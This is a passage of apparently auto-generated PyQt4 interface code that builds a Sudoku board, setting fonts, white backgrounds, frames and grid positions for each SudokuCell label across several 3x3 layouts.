sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_4_1.sizePolicy().hasHeightForWidth())
self.label_4_1.setSizePolicy(sizePolicy)
self.label_4_1.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_4_1.setFont(font)
self.label_4_1.setAutoFillBackground(False)
self.label_4_1.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_4_1.setFrameShape(QtGui.QFrame.Panel)
self.label_4_1.setText(_fromUtf8(""))
self.label_4_1.setTextFormat(QtCore.Qt.PlainText)
self.label_4_1.setAlignment(QtCore.Qt.AlignCenter)
self.label_4_1.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_4_1.setObjectName(_fromUtf8("label_4_1"))
self.gridLayout_4.addWidget(self.label_4_1, 1, 1, 1, 1)
self.label_4_0 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_4_0.sizePolicy().hasHeightForWidth())
self.label_4_0.setSizePolicy(sizePolicy)
self.label_4_0.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_4_0.setFont(font)
self.label_4_0.setAutoFillBackground(False)
self.label_4_0.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_4_0.setFrameShape(QtGui.QFrame.Panel)
self.label_4_0.setText(_fromUtf8(""))
self.label_4_0.setTextFormat(QtCore.Qt.PlainText)
self.label_4_0.setAlignment(QtCore.Qt.AlignCenter)
self.label_4_0.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_4_0.setObjectName(_fromUtf8("label_4_0"))
self.gridLayout_4.addWidget(self.label_4_0, 1, 0, 1, 1)
self.label_5_1 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_5_1.sizePolicy().hasHeightForWidth())
self.label_5_1.setSizePolicy(sizePolicy)
self.label_5_1.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_5_1.setFont(font)
self.label_5_1.setAutoFillBackground(False)
self.label_5_1.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_5_1.setFrameShape(QtGui.QFrame.Panel)
self.label_5_1.setText(_fromUtf8(""))
self.label_5_1.setTextFormat(QtCore.Qt.PlainText)
self.label_5_1.setAlignment(QtCore.Qt.AlignCenter)
self.label_5_1.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_5_1.setObjectName(_fromUtf8("label_5_1"))
self.gridLayout_4.addWidget(self.label_5_1, 2, 1, 1, 1)
self.label_4_2 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_4_2.sizePolicy().hasHeightForWidth())
self.label_4_2.setSizePolicy(sizePolicy)
self.label_4_2.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_4_2.setFont(font)
self.label_4_2.setAutoFillBackground(False)
self.label_4_2.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_4_2.setFrameShape(QtGui.QFrame.Panel)
self.label_4_2.setText(_fromUtf8(""))
self.label_4_2.setTextFormat(QtCore.Qt.PlainText)
self.label_4_2.setAlignment(QtCore.Qt.AlignCenter)
self.label_4_2.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_4_2.setObjectName(_fromUtf8("label_4_2"))
self.gridLayout_4.addWidget(self.label_4_2, 1, 2, 1, 1)
self.label_3_1 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_3_1.sizePolicy().hasHeightForWidth())
self.label_3_1.setSizePolicy(sizePolicy)
self.label_3_1.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_3_1.setFont(font)
self.label_3_1.setAutoFillBackground(False)
self.label_3_1.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_3_1.setFrameShape(QtGui.QFrame.Panel)
self.label_3_1.setFrameShadow(QtGui.QFrame.Plain)
self.label_3_1.setText(_fromUtf8(""))
self.label_3_1.setTextFormat(QtCore.Qt.PlainText)
self.label_3_1.setAlignment(QtCore.Qt.AlignCenter)
self.label_3_1.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_3_1.setObjectName(_fromUtf8("label_3_1"))
self.gridLayout_4.addWidget(self.label_3_1, 0, 1, 1, 1)
self.label_3_0 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_3_0.sizePolicy().hasHeightForWidth())
self.label_3_0.setSizePolicy(sizePolicy)
self.label_3_0.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_3_0.setFont(font)
self.label_3_0.setAutoFillBackground(False)
self.label_3_0.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_3_0.setFrameShape(QtGui.QFrame.Panel)
self.label_3_0.setLineWidth(1)
self.label_3_0.setText(_fromUtf8(""))
self.label_3_0.setTextFormat(QtCore.Qt.PlainText)
self.label_3_0.setScaledContents(False)
self.label_3_0.setAlignment(QtCore.Qt.AlignCenter)
self.label_3_0.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_3_0.setObjectName(_fromUtf8("label_3_0"))
self.gridLayout_4.addWidget(self.label_3_0, 0, 0, 1, 1)
self.label_5_2 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_5_2.sizePolicy().hasHeightForWidth())
self.label_5_2.setSizePolicy(sizePolicy)
self.label_5_2.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_5_2.setFont(font)
self.label_5_2.setAutoFillBackground(False)
self.label_5_2.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_5_2.setFrameShape(QtGui.QFrame.Panel)
self.label_5_2.setText(_fromUtf8(""))
self.label_5_2.setTextFormat(QtCore.Qt.PlainText)
self.label_5_2.setAlignment(QtCore.Qt.AlignCenter)
self.label_5_2.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_5_2.setObjectName(_fromUtf8("label_5_2"))
self.gridLayout_4.addWidget(self.label_5_2, 2, 2, 1, 1)
self.label_5_0 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_5_0.sizePolicy().hasHeightForWidth())
self.label_5_0.setSizePolicy(sizePolicy)
self.label_5_0.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_5_0.setFont(font)
self.label_5_0.setAutoFillBackground(False)
self.label_5_0.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_5_0.setFrameShape(QtGui.QFrame.Panel)
self.label_5_0.setText(_fromUtf8(""))
self.label_5_0.setTextFormat(QtCore.Qt.PlainText)
self.label_5_0.setAlignment(QtCore.Qt.AlignCenter)
self.label_5_0.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_5_0.setObjectName(_fromUtf8("label_5_0"))
self.gridLayout_4.addWidget(self.label_5_0, 2, 0, 1, 1)
self.mainGridLayout.addLayout(self.gridLayout_4, 1, 0, 1, 1)
self.gridLayout_2 = QtGui.QGridLayout()
self.gridLayout_2.setSpacing(0)
self.gridLayout_2.setObjectName(_fromUtf8("gridLayout_2"))
self.label_1_4 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_1_4.sizePolicy().hasHeightForWidth())
self.label_1_4.setSizePolicy(sizePolicy)
self.label_1_4.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_1_4.setFont(font)
self.label_1_4.setAutoFillBackground(False)
self.label_1_4.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_1_4.setFrameShape(QtGui.QFrame.Panel)
self.label_1_4.setText(_fromUtf8(""))
self.label_1_4.setTextFormat(QtCore.Qt.PlainText)
self.label_1_4.setAlignment(QtCore.Qt.AlignCenter)
self.label_1_4.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_1_4.setObjectName(_fromUtf8("label_1_4"))
self.gridLayout_2.addWidget(self.label_1_4, 1, 1, 1, 1)
self.label_1_3 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_1_3.sizePolicy().hasHeightForWidth())
self.label_1_3.setSizePolicy(sizePolicy)
self.label_1_3.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_1_3.setFont(font)
self.label_1_3.setAutoFillBackground(False)
self.label_1_3.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_1_3.setFrameShape(QtGui.QFrame.Panel)
self.label_1_3.setText(_fromUtf8(""))
self.label_1_3.setTextFormat(QtCore.Qt.PlainText)
self.label_1_3.setAlignment(QtCore.Qt.AlignCenter)
self.label_1_3.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_1_3.setObjectName(_fromUtf8("label_1_3"))
self.gridLayout_2.addWidget(self.label_1_3, 1, 0, 1, 1)
self.label_0_4 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_0_4.sizePolicy().hasHeightForWidth())
self.label_0_4.setSizePolicy(sizePolicy)
self.label_0_4.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_0_4.setFont(font)
self.label_0_4.setAutoFillBackground(False)
self.label_0_4.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_0_4.setFrameShape(QtGui.QFrame.Panel)
self.label_0_4.setFrameShadow(QtGui.QFrame.Plain)
self.label_0_4.setText(_fromUtf8(""))
self.label_0_4.setTextFormat(QtCore.Qt.PlainText)
self.label_0_4.setAlignment(QtCore.Qt.AlignCenter)
self.label_0_4.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_0_4.setObjectName(_fromUtf8("label_0_4"))
self.gridLayout_2.addWidget(self.label_0_4, 0, 1, 1, 1)
self.label_2_3 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_2_3.sizePolicy().hasHeightForWidth())
self.label_2_3.setSizePolicy(sizePolicy)
self.label_2_3.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_2_3.setFont(font)
self.label_2_3.setAutoFillBackground(False)
self.label_2_3.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_2_3.setFrameShape(QtGui.QFrame.Panel)
self.label_2_3.setText(_fromUtf8(""))
self.label_2_3.setTextFormat(QtCore.Qt.PlainText)
self.label_2_3.setAlignment(QtCore.Qt.AlignCenter)
self.label_2_3.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_2_3.setObjectName(_fromUtf8("label_2_3"))
self.gridLayout_2.addWidget(self.label_2_3, 2, 0, 1, 1)
self.label_1_5 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_1_5.sizePolicy().hasHeightForWidth())
self.label_1_5.setSizePolicy(sizePolicy)
self.label_1_5.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_1_5.setFont(font)
self.label_1_5.setAutoFillBackground(False)
self.label_1_5.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_1_5.setFrameShape(QtGui.QFrame.Panel)
self.label_1_5.setText(_fromUtf8(""))
self.label_1_5.setTextFormat(QtCore.Qt.PlainText)
self.label_1_5.setAlignment(QtCore.Qt.AlignCenter)
self.label_1_5.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_1_5.setObjectName(_fromUtf8("label_1_5"))
self.gridLayout_2.addWidget(self.label_1_5, 1, 2, 1, 1)
self.label_0_5 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_0_5.sizePolicy().hasHeightForWidth())
self.label_0_5.setSizePolicy(sizePolicy)
self.label_0_5.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_0_5.setFont(font)
self.label_0_5.setAutoFillBackground(False)
self.label_0_5.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_0_5.setFrameShape(QtGui.QFrame.Panel)
self.label_0_5.setText(_fromUtf8(""))
self.label_0_5.setTextFormat(QtCore.Qt.PlainText)
self.label_0_5.setAlignment(QtCore.Qt.AlignCenter)
self.label_0_5.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_0_5.setObjectName(_fromUtf8("label_0_5"))
self.gridLayout_2.addWidget(self.label_0_5, 0, 2, 1, 1)
self.label_2_4 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_2_4.sizePolicy().hasHeightForWidth())
self.label_2_4.setSizePolicy(sizePolicy)
self.label_2_4.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_2_4.setFont(font)
self.label_2_4.setAutoFillBackground(False)
self.label_2_4.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_2_4.setFrameShape(QtGui.QFrame.Panel)
self.label_2_4.setText(_fromUtf8(""))
self.label_2_4.setTextFormat(QtCore.Qt.PlainText)
self.label_2_4.setAlignment(QtCore.Qt.AlignCenter)
self.label_2_4.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_2_4.setObjectName(_fromUtf8("label_2_4"))
self.gridLayout_2.addWidget(self.label_2_4, 2, 1, 1, 1)
self.label_0_3 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_0_3.sizePolicy().hasHeightForWidth())
self.label_0_3.setSizePolicy(sizePolicy)
self.label_0_3.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_0_3.setFont(font)
self.label_0_3.setAutoFillBackground(False)
self.label_0_3.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_0_3.setFrameShape(QtGui.QFrame.Panel)
self.label_0_3.setLineWidth(1)
self.label_0_3.setText(_fromUtf8(""))
self.label_0_3.setTextFormat(QtCore.Qt.PlainText)
self.label_0_3.setScaledContents(False)
self.label_0_3.setAlignment(QtCore.Qt.AlignCenter)
self.label_0_3.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_0_3.setObjectName(_fromUtf8("label_0_3"))
self.gridLayout_2.addWidget(self.label_0_3, 0, 0, 1, 1)
self.label_2_5 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_2_5.sizePolicy().hasHeightForWidth())
self.label_2_5.setSizePolicy(sizePolicy)
self.label_2_5.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_2_5.setFont(font)
self.label_2_5.setAutoFillBackground(False)
self.label_2_5.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_2_5.setFrameShape(QtGui.QFrame.Panel)
self.label_2_5.setText(_fromUtf8(""))
self.label_2_5.setTextFormat(QtCore.Qt.PlainText)
self.label_2_5.setAlignment(QtCore.Qt.AlignCenter)
self.label_2_5.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_2_5.setObjectName(_fromUtf8("label_2_5"))
self.gridLayout_2.addWidget(self.label_2_5, 2, 2, 1, 1)
self.mainGridLayout.addLayout(self.gridLayout_2, 0, 1, 1, 1)
self.gridLayout_6 = QtGui.QGridLayout()
self.gridLayout_6.setSpacing(0)
self.gridLayout_6.setObjectName(_fromUtf8("gridLayout_6"))
self.label_3_7 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_3_7.sizePolicy().hasHeightForWidth())
self.label_3_7.setSizePolicy(sizePolicy)
self.label_3_7.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_3_7.setFont(font)
self.label_3_7.setAutoFillBackground(False)
self.label_3_7.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_3_7.setFrameShape(QtGui.QFrame.Panel)
self.label_3_7.setFrameShadow(QtGui.QFrame.Plain)
self.label_3_7.setText(_fromUtf8(""))
self.label_3_7.setTextFormat(QtCore.Qt.PlainText)
self.label_3_7.setAlignment(QtCore.Qt.AlignCenter)
self.label_3_7.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_3_7.setObjectName(_fromUtf8("label_3_7"))
self.gridLayout_6.addWidget(self.label_3_7, 0, 1, 1, 1)
self.label_4_6 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_4_6.sizePolicy().hasHeightForWidth())
self.label_4_6.setSizePolicy(sizePolicy)
self.label_4_6.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_4_6.setFont(font)
self.label_4_6.setAutoFillBackground(False)
self.label_4_6.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_4_6.setFrameShape(QtGui.QFrame.Panel)
self.label_4_6.setText(_fromUtf8(""))
self.label_4_6.setTextFormat(QtCore.Qt.PlainText)
self.label_4_6.setAlignment(QtCore.Qt.AlignCenter)
self.label_4_6.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_4_6.setObjectName(_fromUtf8("label_4_6"))
self.gridLayout_6.addWidget(self.label_4_6, 1, 0, 1, 1)
self.label_3_6 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_3_6.sizePolicy().hasHeightForWidth())
self.label_3_6.setSizePolicy(sizePolicy)
self.label_3_6.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_3_6.setFont(font)
self.label_3_6.setAutoFillBackground(False)
self.label_3_6.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_3_6.setFrameShape(QtGui.QFrame.Panel)
self.label_3_6.setLineWidth(1)
self.label_3_6.setText(_fromUtf8(""))
self.label_3_6.setTextFormat(QtCore.Qt.PlainText)
self.label_3_6.setScaledContents(False)
self.label_3_6.setAlignment(QtCore.Qt.AlignCenter)
self.label_3_6.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_3_6.setObjectName(_fromUtf8("label_3_6"))
self.gridLayout_6.addWidget(self.label_3_6, 0, 0, 1, 1)
self.label_4_8 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_4_8.sizePolicy().hasHeightForWidth())
self.label_4_8.setSizePolicy(sizePolicy)
self.label_4_8.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_4_8.setFont(font)
self.label_4_8.setAutoFillBackground(False)
self.label_4_8.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_4_8.setFrameShape(QtGui.QFrame.Panel)
self.label_4_8.setText(_fromUtf8(""))
self.label_4_8.setTextFormat(QtCore.Qt.PlainText)
self.label_4_8.setAlignment(QtCore.Qt.AlignCenter)
self.label_4_8.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_4_8.setObjectName(_fromUtf8("label_4_8"))
self.gridLayout_6.addWidget(self.label_4_8, 1, 2, 1, 1)
self.label_5_8 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_5_8.sizePolicy().hasHeightForWidth())
self.label_5_8.setSizePolicy(sizePolicy)
self.label_5_8.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_5_8.setFont(font)
self.label_5_8.setAutoFillBackground(False)
self.label_5_8.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_5_8.setFrameShape(QtGui.QFrame.Panel)
self.label_5_8.setText(_fromUtf8(""))
self.label_5_8.setTextFormat(QtCore.Qt.PlainText)
self.label_5_8.setAlignment(QtCore.Qt.AlignCenter)
self.label_5_8.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_5_8.setObjectName(_fromUtf8("label_5_8"))
self.gridLayout_6.addWidget(self.label_5_8, 2, 2, 1, 1)
self.label_5_7 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_5_7.sizePolicy().hasHeightForWidth())
self.label_5_7.setSizePolicy(sizePolicy)
self.label_5_7.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_5_7.setFont(font)
self.label_5_7.setAutoFillBackground(False)
self.label_5_7.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_5_7.setFrameShape(QtGui.QFrame.Panel)
self.label_5_7.setText(_fromUtf8(""))
self.label_5_7.setTextFormat(QtCore.Qt.PlainText)
self.label_5_7.setAlignment(QtCore.Qt.AlignCenter)
self.label_5_7.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_5_7.setObjectName(_fromUtf8("label_5_7"))
self.gridLayout_6.addWidget(self.label_5_7, 2, 1, 1, 1)
self.label_3_8 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_3_8.sizePolicy().hasHeightForWidth())
self.label_3_8.setSizePolicy(sizePolicy)
self.label_3_8.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_3_8.setFont(font)
self.label_3_8.setAutoFillBackground(False)
self.label_3_8.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_3_8.setFrameShape(QtGui.QFrame.Panel)
self.label_3_8.setText(_fromUtf8(""))
self.label_3_8.setTextFormat(QtCore.Qt.PlainText)
self.label_3_8.setAlignment(QtCore.Qt.AlignCenter)
self.label_3_8.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_3_8.setObjectName(_fromUtf8("label_3_8"))
self.gridLayout_6.addWidget(self.label_3_8, 0, 2, 1, 1)
self.label_5_6 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_5_6.sizePolicy().hasHeightForWidth())
self.label_5_6.setSizePolicy(sizePolicy)
self.label_5_6.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_5_6.setFont(font)
self.label_5_6.setAutoFillBackground(False)
self.label_5_6.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_5_6.setFrameShape(QtGui.QFrame.Panel)
self.label_5_6.setText(_fromUtf8(""))
self.label_5_6.setTextFormat(QtCore.Qt.PlainText)
self.label_5_6.setAlignment(QtCore.Qt.AlignCenter)
